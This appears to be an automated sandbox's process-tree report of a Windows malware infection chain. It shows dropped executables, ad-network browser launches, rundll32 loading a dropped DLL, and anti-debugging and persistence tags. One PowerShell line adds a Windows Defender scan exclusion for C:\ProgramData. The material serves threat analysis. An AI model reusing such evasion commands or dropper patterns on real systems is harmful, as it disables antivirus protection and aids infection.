C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1040 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6384 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6392 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1256 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2128 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,1786079279698569007,1610043438945615198,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:18⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15fbd6ef41b4f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15fbd6ef41b4f.exeWed15fbd6ef41b4f.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15566afaea59e.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15566afaea59e.exeWed15566afaea59e.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15edb855a49.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15edb855a49.exeWed15edb855a49.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2806⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15c2e7469a14dca.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15c2e7469a14dca.exeWed15c2e7469a14dca.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv bIwyp2o330q1fggh9KFnew.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\is-4FQCD.tmp\Wed15fbd6ef41b4f.tmp"C:\Users\Admin\AppData\Local\Temp\is-4FQCD.tmp\Wed15fbd6ef41b4f.tmp" /SL5="$10216,239846,156160,C:\Users\Admin\AppData\Local\Temp\7zS043CC0F0\Wed15fbd6ef41b4f.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-C066L.tmp\Sayma.exe"C:\Users\Admin\AppData\Local\Temp\is-C066L.tmp\Sayma.exe" /S /UID=burnerch22⤵
-
C:\Program Files\Uninstall Information\HWAUGXAZDQ\ultramediaburner.exe"C:\Program Files\Uninstall Information\HWAUGXAZDQ\ultramediaburner.exe" /VERYSILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-88G45.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-88G45.tmp\ultramediaburner.tmp" /SL5="$30330,281924,62464,C:\Program Files\Uninstall Information\HWAUGXAZDQ\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\38-71ed1-9d0-89c99-61059230f916f\Nypaedobuzhi.exe"C:\Users\Admin\AppData\Local\Temp\38-71ed1-9d0-89c99-61059230f916f\Nypaedobuzhi.exe"3⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514834⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515134⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xc4,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe4,0xe8,0x48,0xe0,0x10c,0x7ffcb03546f8,0x7ffcb0354708,0x7ffcb03547185⤵
-
C:\Users\Admin\AppData\Local\Temp\6b-c7740-432-b9e85-e92e3598a5f1a\Tabalotaevo.exe"C:\Users\Admin\AppData\Local\Temp\6b-c7740-432-b9e85-e92e3598a5f1a\Tabalotaevo.exe"3⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\di0gztvg.int\GcleanerEU.exe /eufive & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\di0gztvg.int\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\di0gztvg.int\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3728 -s 2766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slcqf10j.542\installer.exe /qn CAMPAIGN="654" & exit4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\slcqf10j.542\installer.exeC:\Users\Admin\AppData\Local\Temp\slcqf10j.542\installer.exe /qn CAMPAIGN="654"5⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\slcqf10j.542\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\slcqf10j.542\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632941648 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dr4h13ni.xm2\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\dr4h13ni.xm2\any.exeC:\Users\Admin\AppData\Local\Temp\dr4h13ni.xm2\any.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amvcekzx.xil\gcleaner.exe /mixfive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\amvcekzx.xil\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\amvcekzx.xil\gcleaner.exe /mixfive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 2766⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwigwrea.ln2\autosubplayer.exe /S & exit4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3488 -ip 34881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5028 -ip 50281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2520 -ip 25201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5516 -ip 55161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 784 -ip 7841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 716 -ip 7161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5640 -ip 56401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 664 -ip 6641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2896 -ip 28961⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5216 -ip 52161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6464 -ip 64641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4768 -ip 47681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6052 -ip 60521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5472 -ip 54721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 352 -p 3756 -ip 37561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1176 -ip 11761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\184C.exeC:\Users\Admin\AppData\Local\Temp\184C.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\184C.exeC:\Users\Admin\AppData\Local\Temp\184C.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2628.exeC:\Users\Admin\AppData\Local\Temp\2628.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\2628.exeC:\Users\Admin\AppData\Local\Temp\2628.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\NetFrame.exe"C:\Users\Admin\AppData\Local\Temp\NetFrame.exe"3⤵
- Drops startup file
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\ProgramData4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
